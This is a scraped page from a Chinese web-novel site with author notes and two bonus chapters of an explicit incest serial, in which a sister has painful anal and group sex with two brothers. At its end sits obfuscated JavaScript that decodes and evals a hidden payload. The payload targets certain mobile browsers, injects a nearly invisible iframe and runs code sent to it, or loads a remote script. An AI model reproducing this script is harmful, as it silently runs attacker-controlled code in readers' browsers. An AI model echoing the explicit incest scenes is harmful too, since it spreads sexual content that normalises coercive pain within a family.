ps:小鱼打算开个新文,嗯,和亲们商量一下,有想领养新文男女主的麽?小鱼在不影响文的整体走向的条件下,会把亲的愿望写进去。例如小咩咩很喜欢兄妹的,小鱼就在番外特意加了一个,嗯,不过由於过年比较忙,这个番外写的不是很好,希望小咩咩不要拍偶拉~~

大概就是这个意思吧,嗯,如果感兴趣就联系小鱼吧~~

来年见啦~~小鱼爱你们~~~)

再ps:有亲问大哥哥怎麽没出现,小鱼本来打算让他来个母子恋,後来想想得给老穆家留个传宗接代的。。。。如果亲想看,偶可以写写哈,嘿嘿~~~

;amp;lt;% end if %;amp;gt;

作家的话:

新年快乐~~

☆、39 爱心小番外6【限】

(谢谢pearl小宝贝的礼物,很久木有写3p了,手生的很,大家先看吧,小鱼滚去继续努力码字。。。。)

“好美的n头。。。”艾琪尽量控制自己加剧跳动的心情,嘴巴含住一颗挺立发硬的r头。s过j的艾民慢慢抽出软化的rb,站起身来。把位置让给艾琪。

艾琪坐在心心的柳腰上,玩弄她的玉r。“二哥,说好一起的,你居然不等我!还好我提前回来了!”

“三哥。。心心好累。。。”小巧饱满的r房被三哥的魔爪揉搓着,时而挤高、时而压扁、时而向内弄出深深r沟。心心已经被二哥c弄的迷糊了,此时渐渐意识到三哥胯下的rb也膨胀起来,她有些力不从心了。

“乖,心心不能厚此薄彼,心心躺着不动,三哥自己来。”她皱着眉的可怜样儿并没有让艾琪停下。臀瓣被三哥毫不犹豫地打开,冷冽的空气直袭入裸露的菊x,x感的菊花蕾换来一片chu糙的舌头舔动。

“啊。。不要。。三哥。。那里好脏。。”心心觉得好羞耻,三哥怎麽可以舔那里!她挣扎着想躲开。

艾民抱住她乱动的上身,“不脏不脏,心心的每个地方都好香好甜,心心乖!”艾琪有了哥哥的帮助,更加肆意的进攻这个未开发的地带。

“嗯。。。。”无助的娇喘在她娇美的容貌衬托下,增添了无限的春色,看的哥哥们都意乱情迷。三哥更是把她的丰臀抓出十个红印。

“哥哥。。哥哥。。。”她觉得好难过,好空虚,为什麽哥哥还不进来。

“怎麽了宝贝?”二哥沿着珍珠般光滑的脊背,一路往上,舔舐,轻咬,直到香肩。

“哥哥。。心心想要哥哥。。。”

三哥的舌头从润湿的菊x离,他直起腰身,把巨大的g头顶到菊x口,双手握住她的腰眼。“宝宝,哥哥想进心心的小屁眼,心心把後面的第一次给三哥,好不好?”

“三哥,你轻一点儿,刚刚二哥弄疼心心了。”狭小的菊x显然不能接受那麽庞大的物体,她力尽拱起腰,配合三哥的动作。

三哥爱抚着前端的花核,引开她的注意力,“慢慢来,心心太嫩太小,是得吃些苦头的。”另一只手按住她的臀部,g头试着进入。

可是菊x完全是闭合的,圆硕的g头g本无法进入。二哥见状,从她臀後伸出双手,掰开臀瓣,两个食指硬生生的把後x扣开。“宝贝儿,为了三哥,忍一忍,一会儿就好!”

三哥默契的就着那个小口往里c,狭窄的通道寸步难行。

“啊!!哥哥哥哥。。好痛!”眼泪夺眶而出,身体颤抖着卷缩一团。

“宝宝,乖。”二哥吻着她的眼睛,吸掉泪珠。“宝贝,不哭不哭,心心最b了,再忍忍,就快好了!”三哥也是心疼的不行,可箭在弦上不得不发,只能狠心,猛的往进戳。

“啊!太大了!哥哥!!”尽可能的放松,可还是被撑得好难过,仿佛整个下体都被扩展开去,填塞得好满,完全不留一丝细缝。

菊x的褶皱被全部撑开,心心疼的卷缩在二哥的怀里,一动也不敢动,小脸儿疼的通红,大滴的汗珠从额头滚落。

;amp;lt;% end if %;amp;gt;

作家的话:

大姨妈来的时候写3p,好痛苦啊555

这几天只更穆府,宝贝们来吃rr吧~~

☆、40 爱心小番外7【限】

(最亲爱的小咩咩又送小鱼4个礼物,比大姨妈来时的红糖水还温暖~~写完穆府,就去写三少的,一定会让他吃上rr滴!!)

“老三,你轻点,看把宝贝疼的!”二哥心疼的搂着心心,为她擦干汗水,吻干眼角的泪花。

三哥也是一动也不敢动,大手轻揉她的腰身,“心心乖,都是三哥不好,弄疼心心了。心心太诱人了,三哥真的忍不住。。。”

难耐的痛楚稍微减轻,心心下意识的往三哥的身体凑近,小手m上他俊美的带着歉意的脸:“心心不疼了,心心不怪哥哥。”紧皱的柳眉渐渐舒展,身体也慢慢放松,抬头对着背後的二哥微笑:“二哥哥你别凶三哥,已经不疼了!”

抱着较小的身子,两人努力克制自己的心情。做女红被绣针刺到都能掉泪珠的她,为了满足你,疼的泪水横流,反过来安慰你,明明已经累到脱力,为了满足你,硬撑着接纳你的巨大。这麽个娇滴滴俏生生的宝贝,为了你,她能忍着疼忍着累。这麽个小宝贝,叫人怎麽能不爱不疼不宠?!

“宝贝!”三哥的吻铺天盖地而来,霸道的舌喂入她嘴里反复的撩拨,摩挲着她的小舌头,勾引着它一起放纵。

二哥亲吻着她仰高的雪颈,锁骨,丰r,最後含住r头,不再离去,反复允吸,咬扯,仿佛想吸出n。

被吻的神魂颠倒,快喘不过气来,三哥才松开口。花x里的y水伴着二哥s入的jy,流到三哥的bg部,又沿着rb,流到菊x口。

三哥食指沾了沾滑腻的粘y,均匀的涂抹在她红肿的双唇。“小心心流了好多水,哥哥的大b子都被弄湿了!”他愉悦的低笑。

心心下意识的舔食,三哥笑的更开心了,食指勾逗着小舌,“真是个小y娃娃,连自己的y水都不放过!”

“心心早被我们调教出来了,一天不吃b喝j就饿的无法入睡!”二哥也很满意心心的表现:“宝贝又饿了?”

听到y荡的话语,心窝儿酥麻,她抗议的捶了捶身前三哥的x膛:“坏哥哥!”被填满的菊x很舒服,可空虚的前x里面又痒又饥渴,哥哥们还逗人家!

“好好,哥哥这就给宝宝止痒!”三哥大掌握住她的腰,忽然用力往下一压。rb连g没入。

就这麽硬生生的全部捣入,狠狠的撞上了最里面的肠壁,酸慰的感觉让她全身一麻,整个人都酥了去的哀叫出来,“啊!哥哥好深啊!”那软软的嫩壁被硬物硬是抵住往里面钻研,逼着它哆嗦着分开细缝,让它强悍的深入再深入。

她无力的剧烈颤抖,差点瘫软下去,太强烈的刺激了!和二哥进入的感觉不同,三哥的rb通过肠道,那种被刺穿的感觉沿着脊椎往上延伸,整个後背酥麻酥麻的。比平时哥哥给她做的後背按摩还要舒服,她愉快的呻吟着。

声声y叫大大刺激了正在冲刺的三哥,他动的更加卖力。二哥也被刺激的不行,s过一次的b身又硬的跟烙铁似的。

他示意老三把心心翻转过来。三哥也不抽出b身,单单转动心心的身体,b身在她的菊x来了个180度的旋转,她的肠子仿佛也随之旋转。“不。。。”她想忍住,可身体远远不受大脑的支配,刚转到一半就泻了身,正好喷在二哥的rb上。

“小y娃,哥哥都还没有碰到你就喷潮了!”二哥把握时机,在她高潮余韵之时,一个挺身,破r而入。

“啊!二哥!!”高潮还未走,新的刺激又来了,同时被两个哥哥c入,对於初初破身的她,是个巨大的挑战。“心心要被撑坏了。。。哥哥。。。”她好怕,那麽大的两g,把前後x撑的满满的,会坏掉的!

“不会的!心心不怕,哥哥会很小心的!”二哥嘴上宽慰她,下身丝毫不松懈,轻车熟路的来到花蜜的源头,“心心不是很喜欢哥哥进小yg麽?哥哥再来一次,好不好?”g头抵在g口,只等着小公主点头,便第一时间刺入。

虽然被撑到极限,但着实没有要撕裂的迹象,心心稍稍放下悬着的心,三哥已经在後面小幅度的耸动,二哥的b身虽然未动,但她被三哥顶着往二哥的rb上送,g头不断的擦过g口,撩的她奇痒无比。

“二哥。。进来。。好痒。”

“遵命,我的公主!”得令的二哥轻松一顶,g头刺入,瞬间被吸的死死的。

“啊!好舒服!!哥哥哥哥。。”从来没有这麽的充实过,两个小x紧紧的吸住rb,不想他们离开。自己最爱的哥哥们正在爱自己,三人身体相连,心灵相通,彼此结合,禁忌的刺激围绕着他们。

“哥哥也好舒服!哥哥好爱心心!”三哥从背後覆盖上她的丰r,二哥用深深的吻来表达心意。

她颤巍巍的呼吸,生怕触动更可怕的快慰。哥哥们先是一个c入一个退出,轮流着来。後来改为同进同出!隔着薄薄的一层肠壁,两g同样巨硕的b身,同时刺入她的最深入,爽的她尖叫不已,高潮迭起。

“宝宝,哥哥要被你夹断了!哥哥要s了!”三哥扎稳马步,猛冲数十次,喷s在她的肠道内。

“不!快出去!二哥!快!”心心突然大力推搡身前的二哥,艾民不知缘由,只得先退出来。“怎麽了宝宝?”

“要尿。。尿。。啊。。。”心心想躲来身前的二哥,可後面还有三哥c在菊x里,被三哥s的高潮迭起,尿意也随意而来。本想错开二哥的身体,可动作还是慢了,透明的yy从花x喷出之後,浅黄色的尿y也喷了出来。

心心羞的想钻地缝,颤抖着尿了二哥一身,不敢抬头,羞红的脸快埋进r房里了。

;amp;lt;% end if %;amp;gt;

作家的话:

本章rr好肥啊,宝贝们多喝水,不要太腻哦!!

大姨妈来的时候码h,好销魂啊~~~
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}